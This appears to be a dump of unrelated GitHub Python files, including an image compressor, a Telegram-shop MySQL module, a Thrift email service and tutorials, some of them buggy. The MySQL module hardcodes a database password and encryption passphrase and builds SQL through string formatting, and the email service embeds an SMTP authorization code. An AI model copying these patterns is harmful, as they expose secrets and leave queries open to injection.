os\r\nfrom PIL import Image\r\n\r\n#loading data from config.json\r\nwith open(\"config.json\", \"r\") as f:\r\n config = json.load(f)\r\n\r\nprint(config['new_size_ratio'])\r\n\r\n\r\ndef get_size_format(b, factor=1024, suffix=\"B\"):\r\n \"\"\"\r\n Scale bytes to its proper byte format\r\n e.g:\r\n 1253656 => '1.20MB'\r\n 1253656678 => '1.17GB'\r\n \"\"\"\r\n for unit in [\"\", \"K\", \"M\", \"G\", \"T\", \"P\", \"E\", \"Z\"]:\r\n if b < 
factor:\r\n return f\"{b:.2f}{unit}{suffix}\"\r\n b /= factor\r\n return f\"{b:.2f}Y{suffix}\"\r\n\r\n\r\ndef compress_img(image_name, new_size_ratio=config['new_size_ratio'], quality=config['quality'], width=config['width'], height=config['height'], to_jpg=True):\r\n print(new_size_ratio,quality,width,height)\r\n # load the image to memory\r\n img = Image.open(image_name)\r\n # print the original image shape\r\n print(\"[*] Image shape:\", img.size)\r\n # get the original image size in bytes\r\n image_size = os.path.getsize(image_name)\r\n # print the size before compression/resizing\r\n print(\"[*] Size before compression:\", get_size_format(image_size))\r\n if new_size_ratio == 1.0:\r\n # if resizing ratio is below 1.0, then multiply width & height with this ratio to reduce image size\r\n img = img.resize((int(img.size[0] * new_size_ratio), int(img.size[1] * new_size_ratio)), Image.ANTIALIAS)\r\n # print new image shape\r\n print(\"[+] New Image shape:\", img.size)\r\n elif width and height:\r\n # if width and height are set, resize with them instead\r\n img = img.resize((width, height), Image.ANTIALIAS)\r\n # print new image shape\r\n print(\"[+] New Image shape:\", img.size)\r\n # split the filename and extension\r\n filename, ext = os.path.splitext(image_name)\r\n # make new filename appending _compressed to the original file name\r\n\r\n new_filename ='a_compress.jpg' \r\n a=config['output_file_image'] + new_filename\r\n # save the image with the corresponding quality and optimize set to True\r\n img.save(f\"{config['output_file_image']}/a.jpg\", quality=quality, optimize=True)\r\n print(\"[+] New file saved:\", new_filename)\r\n# calling the function\r\ncompress_img(config['input_file_image'])","repo_name":"sumit-iot/video_and_image_compression","sub_path":"Compress_image.py","file_name":"Compress_image.py","file_ext":"py","file_size_in_byte":2215,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"32492983534","text":"# The OpenStack Way\nfrom oslo import messaging\nfrom oslo.config import cfg\n\nTRANSPORT = None\nNOTIFIER = None\n\ndef init(conf):\n\tglobal TRANSPORT, NOTIFIER\n\tTRANSPORT = messaging.get_transport(conf)\n\tdriver = 'messaging'\n\tNOTIFIER = messaging.Notifier(TRANSPORT, driver=driver)\n\ndef get_client(topic):\n\tassert TRANSPORT is not None\n\ttarget = messaging.Target(topic=topic)\n\treturn messaging.RPCClient(TRANSPORT, target)\n\n\ndef get_server(topic, endpoints):\n\tassert TRANSPORT is not None\n\tassert type(endpoints) is list\n\tcfg.CONF.import_opt('host', 'sim.nova.compute')\n\ttarget = messaging.Target(topic=topic, server=cfg.CONF.host)\n\treturn messaging.get_rpc_server(TRANSPORT, target, endpoints)\n\ndef get_notifier(publisher_id):\n\t\tassert NOTIFIER is not None\n\t\treturn NOTIFIER.prepare(publisher_id=publisher_id)\n","repo_name":"affear/smart_alloc_simulator","sub_path":"sim/nova/rpc.py","file_name":"rpc.py","file_ext":"py","file_size_in_byte":805,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"8461174519","text":"# P183\n# 变量作用域:变量生效的范围,主要分为 局部变量 和 全局变量\ndef testA():\n a = 100\n print(a) # 函数内部访问,则可以访问变量 a\n\ntestA() # 100\n# print(a)\n\n# NameError: name 'a' is not defined\n# a 是一个局部变量不能全局生效,故显示a没有被定义\n\nx = 10\ndef f():\n x = 5\n print('f内部: x=', x)\n return x * x\n\nprint('f()=', f())\n# f内部: x= 5 # 局部变量和全局变量同名时,局部变量屏蔽全局变量,简称“局部优先”\n# f()= 25 # 若 x = 5 不存在,则 x 可以访问外部变量此时 x = 10,局部变量可以访问全局变量,全局变量不可以访问局部变量\nprint('f外部: 
x=', x) \n# f外部: x= 10\n\n# 如何在将局部变量变为全局变量?修改局部变量为全局变量\n'''\n语法: \nglobal 变量\n变量 = 数值'''\na = 100\ndef testA():\n global a # global 将 a 定义为了全局变量,位置位于 a = 100 下面,所以 a 的值新定义为了 200\n a = 200\n print(a)\n\nprint(a)\n# 100 \ntestA()\n# 200\nprint(a)\n# 200\n\n# 返回值作为参数传递\ndef test1():\n return 50\n\ndef test2(num):\n print(num)\n\nresult = test1()\ntest2(result)\n# 50","repo_name":"luguodezhangsan/VsCode_Python","sub_path":"050-函数变量作用域.py","file_name":"050-函数变量作用域.py","file_ext":"py","file_size_in_byte":1217,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"14764925989","text":"from tkinter import *\n\n\ndef qwer():\n user_inp = user.get()\n if user_inp == '1':\n text_win.insert(0.1, f'{type(user_inp)} - 1\\n')\n elif user_inp == '2':\n text_win.insert(0.0, f'{type(user_inp)} - 2\\n')\n else:\n text_win.insert(0.0, f'Вы ввели текст {type(user_inp)}\\n')\n\n\n\nwin = Tk()\nwin.geometry('500x500')\n\nuser = Entry(win)\nuser.pack()\n\nbtn = Button(win, text='проверить', command=qwer)\nbtn.pack()\n\nglobal text_win\ntext_win = Text(win)\ntext_win.pack()\n\nwin.mainloop()","repo_name":"FrodoB-Shire/programm_for_img","sub_path":"ex.py","file_name":"ex.py","file_ext":"py","file_size_in_byte":522,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"14321288413","text":"n=int(input(\"enter which term you want to get?:-\"))\nsum=0\nk=1\nd=2\na=3\nfor i in range(1,n):\n\tprint(k,',',end='')\n\tk+=a\n\ta+=d\nprint(f'\\n{n}th term=',k)","repo_name":"Sur818/Coding-Projects","sub_path":"python programming/forloop97_nth term.py","file_name":"forloop97_nth term.py","file_ext":"py","file_size_in_byte":150,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"37065598864","text":"import asyncio\nimport aiomysql\n\nfrom .MessageTexts import *\nfrom ..secound.secound_constants import *\nfrom ..secound.Seller.const4seller import *\nfrom ..secound.Seller.constdb4dbseller import *\n\nasync def db4takjoy(flag_Update_Token, **kwargs):\n pre_secure = \"\"\"SET block_encryption_mode = 'aes-256-cbc'; \n SET @key_str = SHA2('My secret passphrase',512);\n SET @init_vector = 'h>1&cr!a[v+qm&3b+F6*P~'; \"\"\" \n db2mem_citypost = (\"\"\"select AES_DECRYPT(`city_name`,@key_str, @init_vector), AES_DECRYPT(`post_purchase`,@key_str, @init_vector) from {table4citypost};\"\"\")\n createtable4citypost = (\"\"\"CREATE TABLE IF NOT EXISTS {table4citypost}(\n `citypost_no` int(12) NOT NULL AUTO_INCREMENT,\n `city_name` Text not NULL,\n `post_purchase` Text not NULL,\n PRIMARY KEY(citypost_no));\"\"\")\n select4customer = (\"\"\"select AES_DECRYPT(user_id,@key_str, @init_vector),\n AES_DECRYPT(user_name,@key_str, @init_vector),\n AES_DECRYPT(first_name,@key_str, @init_vector),\n AES_DECRYPT(last_name,@key_str, @init_vector),\n AES_DECRYPT(Address,@key_str, @init_vector),\n AES_DECRYPT(Phone_Number,@key_str, @init_vector)\n from {table4customer};\"\"\")\n create_customer_table = (\"\"\"CREATE TABLE IF NOT EXISTS {table4customer}(\n `emp_nu` int(12) NOT NULL AUTO_INCREMENT,\n `user_id` Text NULL,\n `user_name` Text NULL,\n `first_name` Text NULL,\n `last_name` Text NULL,\n `Address` Text NULL,\n `Phone_Number` Text NULL,\n `city_dict` Text NULL,\n `Postal_code` Text NULL,\n PRIMARY KEY(emp_nu));\"\"\")\n update_token = (\"\"\"SET block_encryption_mode = 'aes-256-cbc';\n SET @key_str = SHA2('My secret passphrase',512); \n SET @init_vector = 'h>1&cr!a[v+qm&3b+F6*P~';\n 
SET @ENCRYPT_Bot_id = '{Bot_id}';\n SET @ENCRYPT_Token = '{Token}';\n UPDATE Token_Takjoy set `Token` = AES_ENCRYPT(@ENCRYPT_Token, @key_str, @init_vector) where `Bot_id` = AES_ENCRYPT(@ENCRYPT_Bot_id, @key_str, @init_vector);\"\"\")\n\n loop = asyncio.get_event_loop()\n conn = await aiomysql.connect(host='127.0.0.1', port=3306, \n user='root', password=\"lk1l,tr3ldal5\",charset = \"utf8\",\n db='Test', loop=loop)\n\n cur = await conn.cursor()\n async with conn.cursor() as cur: \n await cur.execute(sql)\n await conn.commit()\n if flag_Update_Token == 0:\n cur = await conn.cursor()\n insert_table = (\"\"\"SET block_encryption_mode = 'aes-256-cbc';\n SET @key_str = SHA2('My secret passphrase',512); \n SET @init_vector = 'h>1&cr!a[v+qm&3b+F6*P~'; \n SET @ENCRYPT_User_id = '{User_id}'; \n SET @ENCRYPT_Bot_id = '{Bot_id}'; \n SET @ENCRYPT_Token = '{Token}'; \n INSERT IGNORE INTO Token_Takjoy(User_id, Token, Bot_Date, Bot_ID) \n VALUES(AES_ENCRYPT(@ENCRYPT_User_id,@key_str, @init_vector), \n AES_ENCRYPT(@ENCRYPT_Token,@key_str, @init_vector), \n (CURDATE() + interval {Daysetting} day), \n AES_ENCRYPT(@ENCRYPT_Bot_id,@key_str, @init_vector));\"\"\")\n \n len_flag = len(saveindb)\n for i in range(0,len_flag):\n my_user_id = saveindb.pop()\n await cur.execute(insert_table.format(User_id = str(my_user_id),\n Token = true_token[my_user_id], \n Bot_id = kwargs[\"Bot_id\"], \n Daysetting = int(kwargs[\"Daysetting\"])))\n await conn.commit() \n\n elif flag_Update_Token == 1: \n await cur.execute(befor_select_all)\n await conn.commit()\n await cur.execute(select_all)\n await conn.commit()\n result_db = await cur.fetchall()\n await cur.execute(select4botmaker)\n await conn.commit()\n curbing_repeat_bot = await cur.fetchall()\n for row in curbing_repeat_bot:\n if row[0] and row[1]:\n dic_bot_user_id[row[0].decode('utf8')] = row[1].decode('utf8')\n dic_user_id_bot[row[1].decode('utf8')] = row[0].decode('utf8')\n if row[1].decode('utf8') not in list_bot_id:\n list_bot_id.append(row[1].decode('utf8'))\n await cur.execute(select4chargebot)\n await conn.commit()\n db2mem4charge_bot = await cur.fetchall()\n for row in db2mem4charge_bot:\n if row[1] and row[0]:\n dic4charge_bot_id2token[row[1].decode('utf8')] = row[0].decode('utf8')\n\n for row in result_db:\n if row[1]:\n row1 = row[1].decode('utf8')\n row2 = row[2].decode('utf8')\n temp_bot_un = row[4].decode('utf8')\n temp_bot_date = row[3]\n if row1:\n if row1 not in dict4bot_ids4users:\n dict4bot_ids4users[row1] = []\n if temp_bot_un not in dict4bot_ids4users[row1]:\n dict4bot_ids4users[row1].append(temp_bot_un)\n\n Date_bot[temp_bot_un] = temp_bot_date\n user_id4owner[row2] = str(row1) + row2\n UNT_Dict[row[0]] = [row1, row2, temp_bot_date]\n await cur.execute(createtable4seller.format(table4seller = row[0]))\n await cur.execute(select_all_seller.format(table4seller = row[0]))\n await conn.commit()\n result_sellers = await cur.fetchall()\n seller_dict[row1 + row2] = []\n for seller_row in result_sellers:\n seller_row1 = seller_row0 = None\n if seller_row[1]:\n seller_row1 = seller_row[1].decode('utf8')\n if seller_row[0]:\n seller_row0 = seller_row[0].decode('utf8')\n seller_dict[row1 + row2].append([seller_row1, seller_row0])\n table4citypost = \"post4city_\" + str(row[0])\n await cur.execute(createtable4citypost.format(table4citypost = table4citypost))\n await conn.commit()\n await cur.execute(db2mem_citypost.format(table4citypost = table4citypost))\n await conn.commit()\n citypost_iter = await cur.fetchall()\n for citypost in citypost_iter:\n if 
citypost[0] and citypost[1]:\n citypost_0 = citypost[0].decode('utf8') \n citypost_1 = citypost[1].decode('utf8')\n if row[0] not in dict_citypost:\n dict_citypost[row[0]] = []\n dict_citypost[row[0]].append([citypost_0, citypost_1])\n table4customer = \"sec_customer_\" + str(row[0])\n await cur.execute(create_customer_table.format(table4customer = table4customer))\n await conn.commit()\n await cur.execute(select4customer.format(table4customer = table4customer))\n await conn.commit()\n iter4customer_chars = await cur.fetchall()\n for customer_chars in iter4customer_chars:\n if row[0] not in dic_user_id:\n dic_user_id[row[0]] = []\n dic_user_id[row[0]].append(customer_chars[0].decode('utf8'))\n for index in range(1, len(customer_chars)-1):\n if customer_chars[index]:\n list4customer_chars[index-1][customer_chars[0].decode('utf8') + row2] = customer_chars[index].decode('utf8')\n dict_token2e_num[row2] = row[0]\n else:\n return True\n\n elif flag_Update_Token == 2:\n for U_id in changeindb:\n Temp_Exchange_Token = save_new_token[U_id]\n Exchange_Token = (U_id, Temp_Exchange_Token[1])\n await cur.execute(Update_Token, Exchange_Token)\n await conn.commit()\n\n elif flag_Update_Token == 3:\n create_table_seller = \"sec_sell_\" + str(kwargs[\"table_name\"])\n temp_key = kwargs[\"key_acc\"]\n table_seller = (dic_first_button.get(temp_key),\n dic_secound_button.get(temp_key),\n dic_title.get(temp_key),\n dic_context.get(temp_key),\n dic_price_ware.get(temp_key),\n dic_currency_ware.get(temp_key),\n dic_unit_ware.get(temp_key),\n dic_discount.get(temp_key),\n dic_photo_file.get(temp_key),\n file_id.get(temp_key),\n day_code.get(temp_key))\n\n create_other_table = (\"CREATE TABLE IF NOT EXISTS \" + create_table_seller + \" (\"\n \"`emp_nu` int(12) NOT NULL AUTO_INCREMENT,\"\n \"`first_button` Text NULL,\"\n \"`secound_button` Text NULL,\"\n \"`title` Text NULL,\"\n \"`context` Text NULL,\"\n \"`price_ware` Text NULL,\"\n \"`currency_ware` Text NULL,\"\n \"`unit_ware` Text NULL,\"\n \"`discount` Text NULL,\"\n \"`photo_file` Text NULL,\"\n \"`file_id` Text NULL,\"\n \"`showindays` Text NULL,\"\n \"PRIMARY KEY(emp_nu));\")\n\n save_in_other_table = (\"SET block_encryption_mode = 'aes-256-cbc'; \"\n \"SET @key_str = SHA2('My secret passphrase',512);\"\n \"SET @init_vector = 'h>1&cr!a[v+qm&3b+F6*P~'; \"\n \"INSERT IGNORE INTO \"+create_table_seller+\"(\"\n \"first_button, secound_button, title, context, currency_ware, price_ware, unit_ware, discount, photo_file, file_id, showindays)\"\n \"VALUES(AES_ENCRYPT(%s,@key_str, @init_vector),\"\n \"AES_ENCRYPT(%s,@key_str, @init_vector),\"\n \"AES_ENCRYPT(%s,@key_str, @init_vector),\"\n \"AES_ENCRYPT(%s,@key_str, @init_vector),\"\n \"AES_ENCRYPT(%s,@key_str, @init_vector),\"\n \"AES_ENCRYPT(%s,@key_str, @init_vector),\"\n \"AES_ENCRYPT(%s,@key_str, @init_vector),\"\n \"AES_ENCRYPT(%s,@key_str, @init_vector),\"\n \"AES_ENCRYPT(%s,@key_str, @init_vector),\"\n \"AES_ENCRYPT(%s,@key_str, @init_vector),\"\n \"AES_ENCRYPT(%s,@key_str, @init_vector));\")\n\n await cur.execute(create_other_table)\n await conn.commit()\n await cur.execute(save_in_other_table, table_seller)\n await conn.commit()\n\n elif flag_Update_Token == \"chang_token\":\n await cur.execute(update_token.format(Bot_id = kwargs[\"bot_id\"], Token = kwargs[\"new_token\"]))\n await conn.commit()\n\n elif flag_Update_Token == \"give_bot_id4ch_t\":\n give_bot_id = \"\"\"SET @ENCRYPT_User_id = '{User_id}'; \n select AES_DECRYPT(Bot_ID,@key_str, @init_vector) from Token_Takjoy where @ENCRYPT_User_id = 
AES_DECRYPT(User_id, @key_str, @init_vector);\"\"\"\n await cur.execute(pre_secure)\n await conn.commit()\n await cur.execute(give_bot_id.format(User_id = str(kwargs[\"user_id\"])))\n await conn.commit()\n result_bot_names = await cur.fetchall()\n return result_bot_names\n\n elif flag_Update_Token == \"charge_bot\":\n charge_bot_table = \"\"\"SET @ENCRYPT_Bot_id = '{Bot_id}';\n UPDATE Token_Takjoy SET `Bot_Date` = DATE_ADD(`Bot_Date` , INTERVAL {Daysetting} DAY)\n where Bot_id = AES_ENCRYPT(@ENCRYPT_Bot_id,@key_str, @init_vector)\"\"\"\n await cur.execute(pre_secure)\n await conn.commit()\n await cur.execute(charge_bot_table.format(Bot_id = kwargs[\"bot_id\"], Daysetting = str(kwargs[\"day\"])))\n await conn.commit()\n return\n\n elif flag_Update_Token == \"create_db4citypost\":\n table4citypost = \"post4city_\" + str(kwargs[\"table_name\"])\n createtable4citypost = (\"\"\"CREATE TABLE IF NOT EXISTS {table4citypost}(\n `citypost_no` int(12) NOT NULL AUTO_INCREMENT,\n `city_name` Text not NULL,\n `post_purchase` Text not NULL,\n PRIMARY KEY(citypost_no));\"\"\")\n save_in_citypost = (\"\"\"INSERT IGNORE INTO {table4citypost}(city_name, post_purchase)\n VALUES(AES_ENCRYPT('{city_name}',@key_str, @init_vector),\n AES_ENCRYPT('{post_purchase}',@key_str, @init_vector));\"\"\")\n await cur.execute(pre_secure)\n await conn.commit()\n await cur.execute(createtable4citypost.format(table4citypost = table4citypost))\n await conn.commit()\n await cur.execute(save_in_citypost.format(table4citypost = table4citypost, city_name = kwargs[\"city_name\"], post_purchase = kwargs[\"post_purchase\"]))\n await conn.commit()\n\n elif flag_Update_Token == \"db4citypost\":\n table4citypost = \"post4city_\" + str(kwargs[\"table_name\"])\n createtable4citypost = (\"\"\"CREATE TABLE IF NOT EXISTS {table4citypost}(\n `citypost_no` int(12) NOT NULL AUTO_INCREMENT,\n `city_name` Text not NULL,\n `post_purchase` Text not NULL,\n PRIMARY KEY(citypost_no));\"\"\")\n take_from_citypost = (\"\"\"select AES_DECRYPT(city_name,@key_str, @init_vector),\n AES_DECRYPT(post_purchase,@key_str, @init_vector)\n from {table4citypost};\"\"\")\n edit_citypost = (\"\"\"update {table4citypost} set `city_name` = AES_ENCRYPT('{city_name}',@key_str, @init_vector),\n `post_purchase` = AES_ENCRYPT('{city_name}',@key_str, @init_vector) where\n `city_name` = AES_ENCRYPT('{ex_city_name}',@key_str, @init_vector);\"\"\")\n delete_citypost = (\"\"\"DELETE FROM {table4citypost} where `city_name` = AES_ENCRYPT('{city_name}',@key_str, @init_vector);\"\"\")\n await cur.execute(pre_secure)\n await conn.commit()\n await cur.execute(createtable4citypost.format(table4citypost = table4citypost))\n await conn.commit() \n if kwargs['ctrl_account'] == \"take_from_citypost\":\n await cur.execute(take_from_citypost.format(table4citypost = table4citypost))\n await conn.commit()\n result_sellers = await cur.fetchall()\n return result_sellers \n elif kwargs['ctrl_account'] == \"edit_citypost\":\n await cur.execute(edit_citypost.format(table4citypost = table4citypost, city_name = kwargs[\"city_name\"], post_purchase = kwargs[\"purchaseofcity\"], ex_city_name = kwargs[\"ex_city_name\"]))\n await conn.commit()\n elif kwargs['ctrl_account'] == \"delete_citypost\":\n await cur.execute(delete_citypost.format(table4citypost = table4citypost, city_name = kwargs[\"city_name\"]))\n await conn.commit() \n\n elif flag_Update_Token ==\"account_db\":\n table4account = \"account_\" + str(kwargs[\"table_num\"])\n createtable4citypost = (\"\"\"CREATE TABLE IF NOT EXISTS 
{table4account}(\n `account_no` int(12) NOT NULL AUTO_INCREMENT,\n `account_num` Text not NULL,\n `account_name` Text not NULL,\n PRIMARY KEY(account_no));\"\"\")\n save_in_citypost = (\"\"\"INSERT IGNORE INTO {table4account}(account_num, account_name)\n VALUES(AES_ENCRYPT('{account_num}',@key_str, @init_vector),\n AES_ENCRYPT('{account_name}',@key_str, @init_vector));\"\"\")\n take_from_db = (\"\"\"select AES_DECRYPT(`account_num`,@key_str, @init_vector) from {table4account};\"\"\")\n take_all_from_db = (\"\"\"select AES_DECRYPT(`account_num`,@key_str, @init_vector), AES_DECRYPT(`account_name`,@key_str, @init_vector) from {table4account};\"\"\")\n Delete_from_db = (\"\"\"Delete from {table4account} where '{account_num}' = AES_DECRYPT(`account_num`,@key_str, @init_vector);\"\"\")\n await cur.execute(pre_secure)\n await conn.commit()\n await cur.execute(createtable4citypost.format(table4account = table4account))\n await conn.commit()\n result_db = await cur.fetchall()\n if kwargs['ctrl_account'] == \"save_in_db\":\n await cur.execute(save_in_citypost.format(table4account = table4account, account_num = kwargs[\"account_num\"], account_name = kwargs[\"account_name\"]))\n await conn.commit()\n elif kwargs['ctrl_account'] == \"take_from_db\":\n await cur.execute(take_from_db.format(table4account = table4account))\n await conn.commit()\n result_account = await cur.fetchall()\n Temp_account = []\n for accounts in result_account:\n Temp_account.append(accounts[0].decode('utf8'))\n return Temp_account\n elif kwargs['ctrl_account'] == \"Delete_from_db\":\n await cur.execute(Delete_from_db.format(table4account = table4account, account_num = kwargs[\"account_num\"]))\n await conn.commit()\n elif kwargs['ctrl_account'] == \"take_all_from_db\":\n await cur.execute(take_all_from_db.format(table4account = table4account))\n await conn.commit()\n result_all_account = await cur.fetchall()\n return result_all_account\n await cur.close()\n conn.close()\n","repo_name":"m2khosravizadeh/Ex_Takjoybot","sub_path":"first/db_takjoy.py","file_name":"db_takjoy.py","file_ext":"py","file_size_in_byte":19509,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"24877854377","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport sys\nsys.path.append(\"/\")\nfrom message.api import MessageService\nfrom thrift.transport import TSocket\nfrom thrift.transport import TTransport\nfrom thrift.protocol import TBinaryProtocol\nfrom thrift.server import TServer\n\nimport smtplib\nfrom email.mime.text import MIMEText\nfrom email.header import Header\n\n#发送email的邮箱和授权码\nsender = \"15604288825@163.com\"\nauthCode = \"xj199804025511hl\"\nclass MessageServiceHandler:\n def sendMobileMessage(self, mobile, message):\n print(\"sendMobileMessage,mobile:\"+mobile+\",message:\"+message)\n return True\n\n def sendEmailMessage(self, email, message):\n print(\"sendEmailMessage,Email:\" + email + \",message:\" + message)\n #create text\n messageObj = MIMEText(message,\"plain\",\"utf-8\")\n messageObj['From'] = sender\n messageObj['To'] = email\n messageObj['Subject'] = Header(\"徐俊的邮件\",\"utf-8\")\n\n try:\n smtpObj = smtplib.SMTP('smtp.163.com')\n smtpObj.login(sender,authCode)\n #send email\n smtpObj.sendmail(sender,email,messageObj.as_string())\n except smtplib.SMTPException as ex:\n print(\"send email filed ...\")\n print(ex)\n return False\n\n print(\"send email success ...\")\n return True\n\nif __name__ == '__main__':\n handler = MessageServiceHandler()\n processor = 
MessageService.Processor(handler)\n transport = TSocket.TServerSocket(None, \"9090\")\n tfactory = TTransport.TFramedTransportFactory()\n pfactory = TBinaryProtocol.TBinaryProtocolFactory()\n\n server = TServer.TSimpleServer(processor, transport, tfactory, pfactory)\n print (\"python thrift server start\")\n server.serve()\n print (\"python thrift server exit\")\n","repo_name":"xvjun/microservice","sub_path":"message-thrift-python-service/message/message_service.py","file_name":"message_service.py","file_ext":"py","file_size_in_byte":1802,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"72188258887","text":"\"\"\"\n @author: Austin Edwards\n\n View for displaying, adding, and removing ImageManagerFileTable data\n\n\"\"\"\n\nfrom PyQt5.QtWidgets import QMainWindow, QTableWidget, QHeaderView\n\nfrom views.image_manager_view_ui import Ui_ImageManagerMainWindow\nfrom controllers.image_manager_ctrl import ImageManagerController\nimport numpy as np\nimport pandas as pd\n\nclass ImageManagerView(QMainWindow):\n def __init__(self, model, main_controller):\n \n super().__init__()\n\n self._model = model\n self._main_controller = main_controller\n\n self._ui = Ui_ImageManagerMainWindow()\n self._ui.setupUi(self)\n self._ui.addImageButton.clicked.connect(self._main_controller.request_image_files)\n self._ui.removeImageButton.clicked.connect(self.remove_images)\n\n self._ui.imageManagerTableView.setSelectionBehavior(QTableWidget.SelectRows)\n self._ui.imageManagerTableView.horizontalHeader().setSectionResizeMode(QHeaderView.Stretch)\n \n self._ui.imageManagerTableView.setModel(self._model)\n\n def remove_images(self):\n \"\"\" Sends selected indexes to delete to file table model \"\"\"\n print(\"REMOVE\")\n self._model.delete_row(self._ui.imageManagerTableView.selectedIndexes())\n\n def closeEvent(self, event):\n \"\"\" Lets the controller know that the window has been closed so that the current image can be updated \"\"\"\n \n event.accept()\n \n if len(self._model._filelist) > 0:\n self._main_controller.file_manager_window_close()\n","repo_name":"awedwards/multiview-image-data-explorer","sub_path":"views/image_manager_view.py","file_name":"image_manager_view.py","file_ext":"py","file_size_in_byte":1545,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"30243575858","text":"from sys import stdin\n\ndef y(n):\n result = []\n for i in range(1, n+1):\n if n%i == 0:\n result.append(i)\n return result\n\ndef x(nlist: list, v:int):\n result = \"\"\n for i in nlist[:-1]:\n for j in nlist[1:]:\n if i+j == v:\n result = \"yes\"\n return result\n result = \"no\"\n return result\n\n\nT = int(input())\nfor i in range(T):\n A, B = map(int, stdin.readline().split())\n tmp = y(A)\n print(x(tmp, B))\n continue","repo_name":"taza0912/daily_coding","sub_path":"BOJ(Baekjoon_Online_Judge)/baekjoon_1402.py","file_name":"baekjoon_1402.py","file_ext":"py","file_size_in_byte":496,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"42694284079","text":"#!/usr/bin/env python3\nimport click\nimport soco\n\n@click.command()\n@click.argument(\"sonos_ip\")\n@click.argument(\"stream_url\")\ndef cli(sonos_ip, stream_url):\n \"\"\"Plays the given STREAM_URL on the SONOS_IP device\"\"\"\n speaker = soco.SoCo(sonos_ip)\n speaker.clear_queue()\n speaker.add_uri_to_queue(stream_url)\n speaker.play_from_queue(0)\n\ndef main():\n 
cli(prog_name=\"sonos-play\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"denysvitali/sonos-live-stream","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":432,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"} +{"seq_id":"20764290424","text":"import scipy.io as sio\nimport numpy as np\nimport tensorflow as tf\nimport random\nfrom sklearn.preprocessing import *\nfrom time import *\nimport os\nimport matplotlib.pyplot as plt\nfrom pylab import *\nfrom sklearn.preprocessing import MinMaxScaler\nfrom PIL import Image\n\n###下面是讲解python怎么读取.mat文件以及怎么处理得到的结果###\nload_fn = 'F:/zhicheng/张森师兄训练数据/ToZZC/feature_10.mat'\nprint(load_fn)\nload_data = sio.loadmat(load_fn)\n# load_matrix = load_data['matrix']\n# 假设文件中存有字符变量是matrix,例如matlab中save(load_fn, 'matrix');\n# 当然可以保存多个save(load_fn, 'matrix_x', 'matrix_y', ...);\n# load_matrix_row = load_matrix[0]\n# 取了当时matlab中matrix的第一行,python中数组行排\n# print(np.split(load_data['feature.P']))\na = load_data['feature'][0]\na = a[0]\ntemp = a[1]\nyj = a[2]\nyj = yj[0]\n\nfwj = a[3]\nfwj = fwj[0]\n# print(\"方位角:\", fwj)\n\ninput_data = np.transpose(temp) # 整理输入\n# print(\"input_data\", input_data)\n# print(\"仰角\", yj)\n\ntrain_data = []\ntest_data = []\nfwjtrainlabel = []\nfwjtestlabel = []\nyjtrainlabel = []\nyjtestlabel = []\ntest_accuracy_list=[]\nCKPT_DIR = 'C:/Users/Administrator/Desktop/owndatatest1/'\n\nfilename = 'C:/Users/Administrator/Desktop/owndatatest2/'\nfilename2 = 'C:/Users/Administrator/Desktop/owndatatest3/'\nfor pic in os.listdir(filename):\n im = Image.open(filename + pic)\n im2 = np.array(im)\n train_data.append(im2)\ntrain_data = np.array(train_data)\n\n\nfor pic in os.listdir(filename2):\n im = Image.open(filename + pic)\n im2 = np.array(im)\n test_data.append(im2)\ntest_data = np.array(test_data)\n\nfor i in range(0, 3360):\n yjtrainlabel.append(yj[i])\nfor i in range(3360, 3840):\n yjtestlabel.append(yj[i]) # 整理标签\n\n\ndata1 = np.array(yjtrainlabel)\nvalues1 = data1\nlabel_encoder1 = LabelEncoder()\ninteger_encoded1 = label_encoder1.fit_transform(values1)\n# print(integer_encoded)\n\nonehot_encoder1 = OneHotEncoder(sparse=False)\ninteger_encoded1 = integer_encoded1.reshape(len(integer_encoded1), 1)\nonehot_encoded1 = onehot_encoder1.fit_transform(integer_encoded1)\nYtrain_onehot = np.array(onehot_encoded1)\n\nprint(\"Ytrain_onehot-----------------\", Ytrain_onehot)\n\n\ndata2 = yjtestlabel\nvalues2 = np.array(data2)\n# print(values)\n\nlabel_encoder2 = LabelEncoder()\ninteger_encoded2 = label_encoder2.fit_transform(values2)\n# print(integer_encoded)\n\nonehot_encoder2 = OneHotEncoder(sparse=False)\ninteger_encoded2 = integer_encoded2.reshape(len(integer_encoded2), 1)\nonehot_encoded2 = onehot_encoder2.fit_transform(integer_encoded2)\nprint(\"onehot_encoded2----------------\", onehot_encoded2)\n\n\n# 初始化过滤器\ndef weight_variable(shape):\n return tf.Variable(tf.truncated_normal(shape, stddev=0.1))\n\n\n# 初始化偏置,初始化时,所有值是0.1\ndef bias_variable(shape):\n return tf.Variable(tf.constant(0.1, shape=shape))\n\n\n# 卷积运算,strides表示每一维度滑动的步长,一般strides[0]=strides[3]=1\n# 第四个参数可选\"Same\"或\"VALID\",“Same”表示边距使用全0填充\ndef conv2d(x, W):\n return tf.nn.conv2d(x, W, strides=[1, 1, 1, 1], padding=\"SAME\")\n\n\n# 池化运算\ndef max_pool_2x2(x):\n return tf.nn.max_pool(x, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding=\"SAME\")\n\n\n# 创建x占位符,用于临时存放MNIST图片的数据,\n# [None, 784]中的None表示不限长度,而784则是一张图片的大小(28×28=784)\nx = tf.placeholder(tf.float32, [None, 28, 28])\n# 
